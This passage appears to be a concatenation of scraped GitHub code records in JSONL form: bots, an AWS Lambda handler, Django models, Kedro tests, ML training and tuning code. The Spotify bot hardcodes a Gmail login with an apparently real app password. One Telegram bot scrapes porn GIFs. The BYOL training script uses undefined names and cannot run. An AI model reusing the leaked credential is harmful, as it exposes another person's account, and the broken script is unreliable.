self.list_songs.user_playlists(self.username)[\"items\"][0][\"id\"]\n self.tracks = [ self.list_songs.search(a, 1, type = \"track\")[\"tracks\"][\"items\"][0][\"uri\"] for a in self.songs ]\n self.list_songs.user_playlist_add_tracks(self.username, self.playlist_id, self.tracks, 0)\n \n \n def send_via_mail(self):\n \n mail = \"obadahpy@gmail.com\"\n msg = f\"\"\"Subject:Spotify playlist\\n\\n\n here is the link of the spotify playlist i made it contains the top 100 tren songs\n for the date you wanted\\n\n https://open.spotify.com/playlist/{self.list_songs.user_playlists(self.username)['items'][0]['id']}\"\"\"\n a = smtplib.SMTP(\"smtp.gmail.com\", 587)\n a.starttls()\n a.login(mail, \"vjmoezoordwzivws\")\n a.sendmail(mail, self.e_ig.get(), msg)\n a.quit","repo_name":"Townsend0/spotify-bot","sub_path":"backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"8037227352","text":"import 
boto3\nfrom botocore.config import Config\nimport json\nimport os\n\nTABLE_NAME = os.environ['TABLE_NAME']\n\nconfig = Config(connect_timeout=5, read_timeout=5, retries={'max_attempts': 1})\ndynamodb = boto3.client('dynamodb', config=config)\n\ndef lambda_handler(event, context):\n print('received event: {}'.format(json.dumps(event)))\n\n # we configured the event source to only receive one message at a time\n msg = json.loads(event['Records'][0]['body'])\n\n # store the received response message in our DynamoDB table for the given rfq-id\n response = dynamodb.put_item(\n TableName = TABLE_NAME, \n Item = {\n 'id': {'S': msg['rfq-id']},\n 'responder': {'S': msg['responder']},\n 'quote': {'N': str(msg['quote'])}\n }\n )\n\n return","repo_name":"aws-samples/asynchronous-messaging-workshop","sub_path":"code/lab-3/quotes-response-service/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"85"} +{"seq_id":"25959120841","text":"import random\nimport time\n\nimport aiohttp\nfrom aiogram import types\nfrom aiogram.utils.exceptions import MessageCantBeDeleted\nfrom bs4 import BeautifulSoup\n\nfrom handlers.parser.headers import headers\nfrom create_bot import rate_limit, bot\n\nlist_images = []\npopular_gifs = []\n\n\n@rate_limit(30, 'p')\nasync def cmd_p(message: types.Message):\n try:\n await message.delete()\n except MessageCantBeDeleted:\n pass\n\n if time.localtime().tm_wday == 4:\n await show(message)\n else:\n mem = await get_gif()\n await message.answer(\"Ты чё??? Порно только по пятницам!\")\n await message.answer_animation(mem)\n\n\nasync def show(message: types.Message):\n if message.chat.id in bot['config'].bot.trusted_groups:\n image = await get_image()\n await message.answer_animation(image)\n else:\n await message.answer('Сорян, лавочка закрылась. 
Можно попросить админа в личку открыть доступ')\n\n\nasync def get_image():\n global list_images\n if not list_images:\n url = f'https://2gifs.ru/page/{random.randint(2, 30)}'\n async with aiohttp.ClientSession() as session:\n async with session.get(url=url, headers=headers) as response:\n soup = BeautifulSoup(await response.text(), 'lxml')\n items = soup.find_all('img', referrerpolicy=\"no-referrer\")\n for i in items:\n list_images.append(i['src'])\n\n image = random.choice(list_images)\n list_images.remove(image)\n return image\n\n\nasync def get_gif():\n global popular_gifs\n if not popular_gifs:\n images = []\n url = 'https://gfycat.com/ru/popular-gifs'\n async with aiohttp.ClientSession() as session:\n async with session.get(url=url, headers=headers) as response:\n if not response.ok:\n return None\n soup = BeautifulSoup(await response.text(), 'lxml')\n items = soup.find_all('img', class_=\"image media\")\n for i in items:\n images.append(i['src'])\n popular_gifs = images.copy()\n\n gif = random.choice(popular_gifs)\n popular_gifs.remove(gif)\n return gif\n","repo_name":"ChirkovRoman1984/AlcoBot","sub_path":"handlers/parser/porno.py","file_name":"porno.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"10423319217","text":"import torch\nimport sys\nimport os \nfrom tqdm import tqdm\nfrom torch.utils.data import DataLoader\nfrom os.path import join\nfrom byol_pytorch import BYOL\nfrom torchvision import models\nfrom torch.optim import Adam\nfrom hyper import hyper as hp\nfrom dataset import ImgDataset\n\n\ndef main(\n data_dir: str, \n model_path: str,\n save_path: str \n):\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n feat_extractor\n model = ImgClassifier()\n # Define dataloader \n train_set = ImgDataset(join(data_dir,'train'), hp.img_size)\n val_set = ImgDataset(join(data_dir,'val'), hp.img_size)\n train_loader = DataLoader(train_set, batch_size=hp.batch_size)\n val_loader = DataLoader(val_set, batch_size=hp.batch_size)\n opt = Adam(learner.parameters(), lr=hp.lr)\n best_loss = float('inf')\n for e in range(hp.n_epoch):\n learner.train()\n train_loss, val_loss = 0,0\n for images in tqdm(train_loader, desc=f'Training epoch {e}:'):\n images = images.to(device)\n loss = learner(images)\n opt.zero_grad()\n loss.backward()\n opt.step()\n learner.update_moving_average() # update moving average of target encoder\n train_loss += loss.item()\n for images in tqdm(val_loader, desc=f'Validation epoch {e}:'):\n loss = learner(images)\n val_loss += loss.item()\n train_loss, val_loss = train_loss/len(train_loader), val_loss/len(val_loader)\n print(f'Epoch {e}: training loss={train_loss}, val loss={val_loss}')\n if best_loss > val_loss:\n best_loss = val_loss\n torch.save(resnet.state_dict(), join(save_dir, 'best_model.mdl'))\n if (e+1)%10 == 0:\n torch.save(resnet.state_dict(), join(save_dir, f'checkpoint{e+1}.mdl'))\n\nif __name__ == '__main__':\n data_dir, model_path, save_path = sys.argv[1], sys.argv[2], sys.argv[3]\n main(data_dir, model_path, save_path)","repo_name":"nervjack2/NTU-DLCV-2021","sub_path":"hw4/p2_src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"23754786968","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.utils.translation import gettext_lazy as _\n\nfrom 
.base_user import User, UserManager\n\n\nclass SupportManager(UserManager):\n \"\"\"\n Manager for support user\n \"\"\"\n\n def get_queryset(self):\n return super().get_queryset().filter(user_type=8)\n\n def create_user(self, username, email=None, password=None, **extra_fields):\n extra_fields.setdefault('is_staff', False)\n extra_fields.setdefault('is_superuser', False)\n extra_fields.setdefault('user_type', 8)\n return self._create_user(username, email, password, **extra_fields)\n\n\nclass SupportUser(User):\n \"\"\"\n Support/Customer care user who can view on-boarded entities/roots or on-board entities.\n \"\"\"\n\n objects = SupportManager()\n\n class Meta:\n proxy = True\n\n\nclass SupportSetup(models.Model):\n \"\"\"\n Support Setup model to link and save the state of the support user setups by super admin\n \"\"\"\n\n support_user = models.OneToOneField(\n SupportUser,\n on_delete=models.CASCADE,\n related_name='my_setups',\n verbose_name=_('Support User')\n )\n user_created = models.ForeignKey(\n 'users.SuperAdminUser',\n on_delete=models.CASCADE,\n related_name='support_setups',\n verbose_name=_('Super Admin User')\n )\n supervisor = models.ForeignKey(\n 'users.SupervisorUser',\n on_delete=models.SET_NULL,\n related_name='my_support_setups',\n verbose_name=_('Supervisor User'),\n null=True\n )\n can_onboard_entities = models.BooleanField(default=False, verbose_name=_('Can On-board Entities?'))\n\n class Meta:\n ordering = ['-id']\n\n def __str__(self):\n \"String representation of each support setup object\"\n return f'{self.user_created} setup for {self.support_user}'\n","repo_name":"mohamedsaber12/cashout","sub_path":"users/models/support.py","file_name":"support.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"72971966038","text":"def sequential_search(list,element):\r\n index = 0\r\n found = False \r\n while index < len(list) and not found :\r\n if list[index] == element:\r\n found = True\r\n else: \r\n index = index + 1\r\n return found , index\r\nprint(sequential_search([1,3,5,7,8,90,4], 90))","repo_name":"abeerelkhamisy/tasks_ieee","sub_path":"seq-search.py","file_name":"seq-search.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"7781163395","text":"import platform\nimport logging.config\nimport os\n\nMACOS, LINUX, WINDOWS = (\n platform.system() == x for x in [\"Darwin\", \"Linux\", \"Windows\"]\n) # environment booleans\n\nLOGGING_NAME = \"LLMCode\"\n\n\ndef set_logging(name=LOGGING_NAME, verbose=True):\n rank = int(os.getenv(\"RANK\", -1)) # rank in world for Multi-GPU\n level = logging.INFO if verbose and rank in {-1, 0} else logging.ERROR\n logging.config.dictConfig(\n {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"formatters\": {name: {\"format\": \"%(message)s\"}},\n \"handlers\": {\n name: {\n \"class\": \"logging.StreamHandler\",\n \"formatter\": name,\n \"level\": level,\n }\n },\n \"loggers\": {name: {\"level\": level, \"handlers\": [name], \"propagate\": False}},\n }\n )\n\n\ndef emojis(string=\"\"):\n \"\"\"Return platform-dependent emoji-safe version of string.\"\"\"\n return string.encode().decode(\"ascii\", \"ignore\") if WINDOWS else string\n\n\nclass EmojiFilter(logging.Filter):\n \"\"\"\n A custom logging filter class for removing emojis in log messages.\n\n This filter is particularly useful for ensuring compatibility with 
Windows terminals\n that may not support the display of emojis in log messages.\n \"\"\"\n\n def filter(self, record):\n \"\"\"Filter logs by emoji unicode characters on windows.\"\"\"\n record.msg = emojis(record.msg)\n return super().filter(record)\n\n\n# Set logger\nset_logging(LOGGING_NAME, verbose=True) # run before defining LOGGER\nLOGGER = logging.getLogger(LOGGING_NAME)\nif WINDOWS: # emoji-safe logging\n LOGGER.addFilter(EmojiFilter())\n","repo_name":"javierganan99/LLMCode","sub_path":"LLMCode/utils/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"70011441238","text":"from src.command.view_command import AppCommand\nfrom src.command.video_command import VideoCommand\n\nimport customtkinter\nfrom dataclasses import dataclass\n\n@dataclass\nclass App:\n\n def __init__(self, view_command:AppCommand, video:VideoCommand):\n self.command = view_command\n self.video = video\n\n def home(self):\n\n customtkinter.set_appearance_mode(\"System\") # Modes: system (default), light, dark\n customtkinter.set_default_color_theme(\"blue\") # Themes: blue (default), dark-blue, green\n\n app = customtkinter.CTk() # create CTk window like you do with the Tk window\n app.geometry(\"400x240\")\n\n def start():\n self.video.get_faces_on_video()\n\n def move():\n self.video.move_clips()\n \n\n # Use CTkButton instead of tkinter Button\n button1 = customtkinter.CTkButton(master=app, text=\"Start\", command=start)\n button1.place(relx=0.25, rely=0.4, anchor=customtkinter.CENTER)\n button2 = customtkinter.CTkButton(master=app, text=\"Move clips\", command=move)\n button2.place(relx=0.75, rely=0.4, anchor=customtkinter.CENTER)\n\n app.mainloop()\n","repo_name":"LiR4/Catch-Face","sub_path":"src/view/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"12797459416","text":"import os\nimport re\nimport sys\nfrom pathlib import Path\n\nimport pytest\nimport toml\n\nfrom kedro import __version__ as kedro_version\nfrom kedro.framework.startup import (\n ProjectMetadata,\n _get_project_metadata,\n _is_project,\n _validate_source_path,\n bootstrap_project,\n)\n\n\nclass TestIsProject:\n project_path = Path.cwd()\n\n def test_no_metadata_file(self, mocker):\n mocker.patch.object(Path, \"is_file\", return_value=False)\n\n assert not _is_project(self.project_path)\n\n def test_toml_invalid_format(self, tmp_path):\n \"\"\"Test for loading context from an invalid path. 
\"\"\"\n toml_path = tmp_path / \"pyproject.toml\"\n toml_path.write_text(\"!!\") # Invalid TOML\n\n assert not _is_project(tmp_path)\n\n def test_non_kedro_project(self, mocker):\n mocker.patch.object(Path, \"is_file\", return_value=True)\n pyproject_toml_payload = {\"tool\": {}}\n mocker.patch(\"anyconfig.load\", return_value=pyproject_toml_payload)\n\n assert not _is_project(self.project_path)\n\n def test_valid_toml_file(self, mocker):\n mocker.patch.object(Path, \"is_file\", return_value=True)\n pyproject_toml_payload = {\"tool\": {\"kedro\": {}}}\n mocker.patch(\"anyconfig.load\", return_value=pyproject_toml_payload)\n\n assert _is_project(self.project_path)\n\n\nclass TestGetProjectMetadata:\n project_path = Path.cwd()\n\n def test_no_config_files(self, mocker):\n mocker.patch.object(Path, \"is_file\", return_value=False)\n\n pattern = (\n f\"Could not find the project configuration file 'pyproject.toml' \"\n f\"in {self.project_path}\"\n )\n with pytest.raises(RuntimeError, match=re.escape(pattern)):\n _get_project_metadata(self.project_path)\n\n def test_toml_invalid_format(self, tmp_path):\n \"\"\"Test for loading context from an invalid path. \"\"\"\n toml_path = tmp_path / \"pyproject.toml\"\n toml_path.write_text(\"!!\") # Invalid TOML\n pattern = \"Failed to parse 'pyproject.toml' file\"\n with pytest.raises(RuntimeError, match=re.escape(pattern)):\n _get_project_metadata(str(tmp_path))\n\n def test_valid_toml_file(self, mocker):\n mocker.patch.object(Path, \"is_file\", return_value=True)\n pyproject_toml_payload = {\n \"tool\": {\n \"kedro\": {\n \"package_name\": \"fake_package_name\",\n \"project_name\": \"fake_project_name\",\n \"project_version\": kedro_version,\n }\n }\n }\n mocker.patch(\"anyconfig.load\", return_value=pyproject_toml_payload)\n\n actual = _get_project_metadata(self.project_path)\n\n expected = ProjectMetadata(\n source_dir=self.project_path / \"src\", # default\n config_file=self.project_path / \"pyproject.toml\",\n package_name=\"fake_package_name\",\n project_name=\"fake_project_name\",\n project_version=kedro_version,\n project_path=self.project_path,\n )\n assert actual == expected\n\n def test_toml_file_with_extra_keys(self, mocker):\n mocker.patch.object(Path, \"is_file\", return_value=True)\n pyproject_toml_payload = {\n \"tool\": {\n \"kedro\": {\n \"package_name\": \"fake_package_name\",\n \"project_name\": \"fake_project_name\",\n \"project_version\": kedro_version,\n \"unexpected_key\": \"hello\",\n }\n }\n }\n mocker.patch(\"anyconfig.load\", return_value=pyproject_toml_payload)\n pattern = (\n \"Found unexpected keys in 'pyproject.toml'. 
Make sure it \"\n \"only contains the following keys: ['package_name', \"\n \"'project_name', 'project_version', 'source_dir'].\"\n )\n\n with pytest.raises(RuntimeError, match=re.escape(pattern)):\n _get_project_metadata(self.project_path)\n\n def test_toml_file_has_missing_mandatory_keys(self, mocker):\n mocker.patch.object(Path, \"is_file\", return_value=True)\n pyproject_toml_payload = {\n \"tool\": {\n \"kedro\": {\"project_version\": kedro_version, \"unexpected_key\": \"hello\"}\n }\n }\n mocker.patch(\"anyconfig.load\", return_value=pyproject_toml_payload)\n pattern = (\n \"Missing required keys ['package_name', 'project_name'] \"\n \"from 'pyproject.toml'.\"\n )\n\n with pytest.raises(RuntimeError, match=re.escape(pattern)):\n _get_project_metadata(self.project_path)\n\n def test_toml_file_without_kedro_section(self, mocker):\n mocker.patch.object(Path, \"is_file\", return_value=True)\n mocker.patch(\"anyconfig.load\", return_value={})\n\n pattern = \"There's no '[tool.kedro]' section in the 'pyproject.toml'.\"\n\n with pytest.raises(RuntimeError, match=re.escape(pattern)):\n _get_project_metadata(self.project_path)\n\n def test_source_dir_specified_in_toml(self, mocker):\n mocker.patch.object(Path, \"is_file\", return_value=True)\n source_dir = \"test_dir\"\n pyproject_toml_payload = {\n \"tool\": {\n \"kedro\": {\n \"source_dir\": source_dir,\n \"package_name\": \"fake_package_name\",\n \"project_name\": \"fake_project_name\",\n \"project_version\": kedro_version,\n }\n }\n }\n mocker.patch(\"anyconfig.load\", return_value=pyproject_toml_payload)\n\n project_metadata = _get_project_metadata(self.project_path)\n\n assert project_metadata.source_dir == self.project_path / source_dir\n\n @pytest.mark.parametrize(\n \"invalid_version\", [\"0.13.0\", \"10.0\", \"101.1\", \"100.0\", \"-0\"]\n )\n def test_invalid_version(self, invalid_version, mocker):\n mocker.patch.object(Path, \"is_file\", return_value=True)\n pyproject_toml_payload = {\n \"tool\": {\n \"kedro\": {\n \"source_dir\": \"source_dir\",\n \"package_name\": \"fake_package_name\",\n \"project_name\": \"fake_project_name\",\n \"project_version\": invalid_version,\n }\n }\n }\n mocker.patch(\"anyconfig.load\", return_value=pyproject_toml_payload)\n\n pattern = (\n f\"Your Kedro project version {invalid_version} does not match \"\n f\"Kedro package version {kedro_version} you are running.\"\n )\n with pytest.raises(ValueError, match=re.escape(pattern)):\n _get_project_metadata(self.project_path)\n\n\nclass TestValidateSourcePath:\n @pytest.mark.parametrize(\n \"source_dir\", [\".\", \"src\", \"./src\", \"src/nested\", \"src/nested/nested\"]\n )\n def test_valid_source_path(self, tmp_path, source_dir):\n source_path = (tmp_path / source_dir).resolve()\n source_path.mkdir(parents=True, exist_ok=True)\n _validate_source_path(source_path, tmp_path.resolve())\n\n @pytest.mark.parametrize(\"source_dir\", [\"..\", \"src/../..\", \"~\"])\n def test_invalid_source_path(self, tmp_path, source_dir):\n source_dir = Path(source_dir).expanduser()\n source_path = (tmp_path / source_dir).resolve()\n source_path.mkdir(parents=True, exist_ok=True)\n\n pattern = re.escape(\n f\"Source path '{source_path}' has to be relative to your project root \"\n f\"'{tmp_path.resolve()}'\"\n )\n with pytest.raises(ValueError, match=pattern):\n _validate_source_path(source_path, tmp_path.resolve())\n\n def test_non_existent_source_path(self, tmp_path):\n source_path = (tmp_path / \"non_existent\").resolve()\n\n pattern = re.escape(f\"Source path 
'{source_path}' cannot be found.\")\n with pytest.raises(NotADirectoryError, match=pattern):\n _validate_source_path(source_path, tmp_path.resolve())\n\n\nclass TestBootstrapProject:\n def test_bootstrap_project(self, mocker, monkeypatch, tmp_path):\n monkeypatch.delenv(\"PYTHONPATH\", raising=False)\n # assume settings.py is okay\n mocker.patch(\"kedro.framework.project._validate_module\")\n pyproject_toml_payload = {\n \"tool\": {\n \"kedro\": {\n \"package_name\": \"fake_package_name\",\n \"project_name\": \"fake_project_name\",\n \"project_version\": kedro_version,\n }\n }\n }\n pyproject_toml = tmp_path / \"pyproject.toml\"\n pyproject_toml.write_text(toml.dumps(pyproject_toml_payload))\n src_dir = tmp_path / \"src\"\n src_dir.mkdir(exist_ok=True)\n\n result = bootstrap_project(tmp_path)\n\n expected_metadata = {\n \"config_file\": pyproject_toml,\n \"package_name\": \"fake_package_name\",\n \"project_name\": \"fake_project_name\",\n \"project_path\": tmp_path,\n \"project_version\": kedro_version,\n \"source_dir\": src_dir,\n }\n assert result == ProjectMetadata(**expected_metadata)\n assert str(src_dir) in sys.path[0]\n assert os.environ[\"PYTHONPATH\"] == str(src_dir)\n","repo_name":"alxxjohn/kedro","sub_path":"tests/framework/test_startup.py","file_name":"test_startup.py","file_ext":"py","file_size_in_byte":9184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"28253395016","text":"i = len(path)-2\nwhile i > 0:\n if path[i-1 : i+2] == '/./' :\n break\n i -= 1\n \nfolderList = []\nfolder = ''\ni += 1\nreadingWord = 0\nwhile i < len(path):\n if path[i] != '/':\n if readingWord==0:\n readingWord = 1\n folder += path[i]\n elif readingWord==1:\n readingWord = 0\n \n if folder=='..':\n # Go up a directory, if possible\n if len(folderList) > 0:\n folderList.pop()\n else:\n folderList.append(folder)\n \n folder = ''\n \n i += 1\n\npath2 = ''\nfor f in folderList:\n path2 += '/' + f\n","repo_name":"NWILLROCKU/Leetcode","sub_path":"2021/0205.py","file_name":"0205.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"1941563442","text":"import numpy as np\nfrom typing import List, Dict, Tuple\nimport logging\nimport random\n\nfrom cell_lineage_tree import CellLineageTree\nfrom barcode_metadata import BarcodeMetadata\nfrom transition_wrapper_maker import TransitionWrapperMaker\nfrom split_data import create_kfold_trees, create_kfold_barcode_trees, TreeDataSplit\nfrom likelihood_scorer import LikelihoodScorer, LikelihoodScorerResult\nfrom parallel_worker import SubprocessManager\nfrom common import get_randint\nfrom model_assessor import ModelAssessor\nfrom optim_settings import KnownModelParams\n\n\nclass PenaltyScorerResult:\n def __init__(\n self,\n score: float,\n fit_results: List[LikelihoodScorerResult]):\n \"\"\"\n @param score: assumed to be higher the better\n \"\"\"\n self.score = score\n self.fit_results = fit_results\n\n\nclass PenaltyTuneResult:\n def __init__(\n self,\n tree: CellLineageTree,\n tree_splits: List[TreeDataSplit],\n results: List[PenaltyScorerResult]):\n self.tree = tree\n self.tree_splits = tree_splits\n self.results = results\n\n def get_best_result(self, warm_idx=0):\n \"\"\"\n @param warm_idx: the index of the fitted model params to use for warm starts\n @return Dict with model/optimization params\n \"\"\"\n pen_param_scores = np.array([r.score for r in self.results])\n logging.info(\"Tuning scores 
%s\", pen_param_scores)\n max_branch_pen_param = np.max([\n r.fit_results[0].fit_params[\"branch_pen_param\"]\n for r in self.results])\n # A hacky way to order the penalty parameters from largest to smallest\n pen_param_array = np.array([\n r.fit_results[0].fit_params[\"target_lam_pen_param\"] * max_branch_pen_param\n + r.fit_results[0].fit_params[\"branch_pen_param\"]\n for r in self.results])\n\n # The best penalty parameters is the first one before the score decreases\n best_idx = np.argmax(pen_param_scores)\n #sorted_idxs = np.argsort(-pen_param_array)\n #best_idx = sorted_idxs[0]\n #best_score = pen_param_scores[sorted_idxs[0]]\n #for idx in sorted_idxs[1:]:\n # if best_score < pen_param_scores[idx]:\n # best_score = pen_param_scores[idx]\n # best_idx = idx\n # else:\n # break\n\n best_pen_result = self.results[best_idx]\n chosen_best_res = best_pen_result.fit_results[warm_idx]\n\n fit_params = chosen_best_res.get_fit_params()\n # Popping branch length estimates because we cannot\n # initialize branch lengths from the kfold trees for the full tree\n fit_params.pop('branch_len_inners', None)\n fit_params.pop('branch_len_offsets_proportion', None)\n return self.tree, fit_params, chosen_best_res\n\n\ndef tune(\n tree: CellLineageTree,\n bcode_meta: BarcodeMetadata,\n args,\n fit_params: Dict,\n assessor: ModelAssessor,\n conv_thres: float = 1e-6):\n \"\"\"\n Tunes the `branch_pen_param`, `target_lam_pen_param` penalty parameters\n\n @return PenaltyTuneResult\n \"\"\"\n assert len(args.branch_pen_params) > 1 or len(args.target_lam_pen_params) > 1\n\n # First create the initialization/optimization settings under consideration\n fit_param_list = []\n for branch_pen_param in args.branch_pen_params:\n for target_lam_pen_param in args.target_lam_pen_params:\n if len(fit_param_list) == 0:\n new_fit_params = fit_params.copy()\n else:\n new_fit_params = {}\n new_fit_params[\"branch_pen_param\"] = branch_pen_param\n new_fit_params[\"target_lam_pen_param\"] = target_lam_pen_param\n new_fit_params[\"conv_thres\"] = conv_thres\n fit_param_list.append(new_fit_params)\n\n if bcode_meta.num_barcodes > 1:\n # For many barcodes, we split by barcode\n return _tune_hyperparams(\n fit_param_list,\n tree,\n bcode_meta,\n args,\n fit_params,\n create_kfold_barcode_trees,\n _get_many_bcode_hyperparam_score,\n assessor)\n else:\n fit_params.pop('branch_len_inners', None)\n fit_params.pop('branch_len_offsets_proportion', None)\n # For single barcode, we split into subtrees\n return _tune_hyperparams(\n fit_param_list,\n tree,\n bcode_meta,\n args,\n fit_params,\n create_kfold_trees,\n _get_one_bcode_hyperparam_score,\n assessor)\n\n\ndef _tune_hyperparams(\n fit_param_list: List[Dict],\n tree: CellLineageTree,\n bcode_meta: BarcodeMetadata,\n args,\n fit_params: Dict,\n kfold_fnc,\n hyperparam_score_fnc,\n assessor: ModelAssessor = None):\n \"\"\"\n @param max_num_chad_parents: max number of chad parents to consider\n @param conv_thres: the convergence threshold for training the model\n (should probably pick something similar to the one being used\n for the hanging chads)\n\n @return List[PenaltyScorerResult] -- corresponding to each hyperparam\n being tuned\n \"\"\"\n # First split the barcode into kfold groups\n n_splits = args.num_penalty_tune_splits if bcode_meta.num_barcodes == 1 else min(args.num_penalty_tune_splits, bcode_meta.num_barcodes)\n logging.info(\"Hyperparam tuning %d splits\", n_splits)\n\n # Make all the tree splits, but we will only fit a random number of them\n all_tree_splits = 
kfold_fnc(tree, bcode_meta, n_splits)\n random.shuffle(all_tree_splits)\n tree_splits = all_tree_splits[:args.max_fit_splits]\n\n trans_wrap_makers = [TransitionWrapperMaker(\n tree_split.train_clt,\n tree_split.train_bcode_meta,\n args.max_extra_steps,\n args.max_sum_states) for tree_split in tree_splits]\n\n # Actually fit the trees using the kfold barcodes\n worker_list = [LikelihoodScorer(\n get_randint(),\n tree_split.train_clt,\n tree_split.train_bcode_meta,\n args.max_iters,\n args.num_inits,\n transition_wrap_maker,\n fit_param_list=fit_param_list,\n known_params=args.known_params,\n scratch_dir=args.scratch_dir,\n use_poisson=args.use_poisson,\n assessor=assessor)\n for tree_split, transition_wrap_maker in zip(tree_splits, trans_wrap_makers)]\n\n # Only need the successful results\n if args.num_processes > 1 and len(worker_list) > 1:\n job_manager = SubprocessManager(\n worker_list,\n None,\n args.scratch_dir,\n args.num_processes)\n train_results = [r for r, _ in job_manager.run()]\n else:\n train_results = [w.run_worker(None) for w in worker_list]\n train_results = [(res, tree_split) for res, tree_split in zip(train_results, tree_splits) if res is not None]\n assert len(train_results) >= 1\n\n # Now find the best penalty param by finding the most stable one\n # Stability is defined as the least variable target lambda estimates and branch length estimates\n tune_results = []\n for idx, fit_param in enumerate(fit_param_list):\n branch_pen_param = fit_param['branch_pen_param']\n target_lam_pen_param = fit_param['target_lam_pen_param']\n logging.info(\n \"PEN PARAM setting %d: branch_pen_param %f target_lam_pen_param %f\",\n idx,\n fit_param['branch_pen_param'],\n fit_param['target_lam_pen_param'])\n res_folds = [(train_res[idx], tree_split) for train_res, tree_split in train_results]\n hyperparam_score = hyperparam_score_fnc(\n res_folds,\n args.max_extra_steps,\n args.max_sum_states,\n args.scratch_dir,\n args.use_poisson,\n args.num_processes)\n\n # Create our summary of tuning\n tune_result = PenaltyScorerResult(\n hyperparam_score,\n [res for res, _ in res_folds])\n tune_results.append(tune_result)\n logging.info(\n \"Pen param branch %f, target_lam %f, hyperparam score %s\",\n branch_pen_param,\n target_lam_pen_param,\n tune_result.score)\n\n return PenaltyTuneResult(\n tree,\n [tree_split for _, tree_split in train_results],\n tune_results)\n\n\ndef _get_many_bcode_hyperparam_score(\n pen_param_results: List[Tuple[LikelihoodScorerResult, TreeDataSplit]],\n max_extra_steps: int,\n max_sum_states: int,\n scratch_dir: str,\n use_poisson: bool,\n num_processes: int):\n \"\"\"\n @return score = the validation log likelihood\n \"\"\"\n for pen_param_res, _ in pen_param_results:\n if pen_param_res is None:\n # This pen param setting is not stable\n return -np.inf\n\n worker_list = []\n for pen_param_res, tree_split in pen_param_results:\n # Use all the fitted params from the training data since we have the\n # same tree topology\n fit_params = pen_param_res.get_fit_params()\n all_known_params = KnownModelParams(\n target_lams=True,\n tot_time=True,\n indel_params=True)\n transition_wrap_maker = TransitionWrapperMaker(\n tree_split.val_clt,\n tree_split.val_bcode_meta,\n max_extra_steps,\n max_sum_states)\n scorer = LikelihoodScorer(\n get_randint(), # seed\n tree_split.val_clt,\n tree_split.val_bcode_meta,\n # No iterations because we just want to evaluate a probability\n max_iters=0,\n num_inits=1,\n transition_wrap_maker=transition_wrap_maker,\n fit_param_list=[fit_params],\n 
known_params=all_known_params,\n scratch_dir=scratch_dir,\n use_poisson=use_poisson)\n worker_list.append(scorer)\n\n job_manager = SubprocessManager(\n worker_list,\n None,\n scratch_dir,\n num_processes)\n worker_results = [w[0][0] for w in job_manager.run()]\n val_log_liks = [res.log_lik for res in worker_results]\n\n tot_val_log_lik = np.sum(val_log_liks)\n logging.info(\"all hyperparam split-scores %s, (sum %f)\", val_log_liks, tot_val_log_lik)\n return tot_val_log_lik\n\n\ndef _get_one_bcode_hyperparam_score(\n pen_param_results: List[Tuple[LikelihoodScorerResult, TreeDataSplit]],\n max_extra_steps: int,\n max_sum_states: int,\n scratch_dir: str,\n use_poisson: bool,\n num_processes: int):\n \"\"\"\n @return score = Pr(validation data | train data)\n \"\"\"\n for pen_param_res, _ in pen_param_results:\n if pen_param_res is None:\n # This pen param setting is not stable\n return -np.inf\n\n worker_list = []\n for pen_param_res, tree_split in pen_param_results:\n # Need to create model parameters for the full tree since\n # we only trained on a subset of the leaves\n fit_params = pen_param_res.get_fit_params()\n #fit_params.pop('branch_len_inners', None)\n #fit_params.pop('branch_len_offsets_proportion', None)\n\n # First we need to preserve any bifurcations in the train tree\n for node in tree_split.train_clt.traverse():\n if len(node.get_children()) == 2:\n matching_node = tree_split.val_clt.search_nodes(node_id=node.node_id)[0]\n matching_node.resolved_multifurcation = True\n\n # Let's start creating the branch lenght assignments for the\n # validation leaves\n spine_lens = pen_param_res.train_history[-1][\"spine_lens\"]\n dist_to_roots = pen_param_res.train_history[-1][\"dist_to_roots\"]\n num_tot_nodes = tree_split.val_clt.get_num_nodes()\n num_train_nodes = tree_split.train_clt.get_num_nodes()\n new_br_inners = np.ones(num_tot_nodes) * 1e-10\n new_br_inners[:num_train_nodes] = fit_params['branch_len_inners']\n # We will place the validation leaves at the top of the multifurcation\n # This is a somewhat arbitrary choice.\n # However we definitely cannot maximize validation log lik wrt the validation offsets.\n # Otherwise penalty param picking will not work.\n new_br_offsets = np.ones(num_tot_nodes) * 0.15\n new_br_offsets[:num_train_nodes] = fit_params['branch_len_offsets_proportion']\n for node_id in range(num_train_nodes, num_tot_nodes):\n val_node = tree_split.val_clt.search_nodes(node_id=node_id)[0]\n if not val_node.up.resolved_multifurcation:\n up_id = val_node.up.node_id\n br_inner = fit_params[\"tot_time\"] - dist_to_roots[up_id]\n spine_len = spine_lens[up_id]\n # Place halfway on the spine...\n new_br_offsets[node_id] = spine_len/2/br_inner\n\n fit_params['branch_len_inners'] = new_br_inners\n fit_params['branch_len_offsets_proportion'] = new_br_offsets\n all_known_params = KnownModelParams(\n target_lams=True,\n tot_time=True,\n 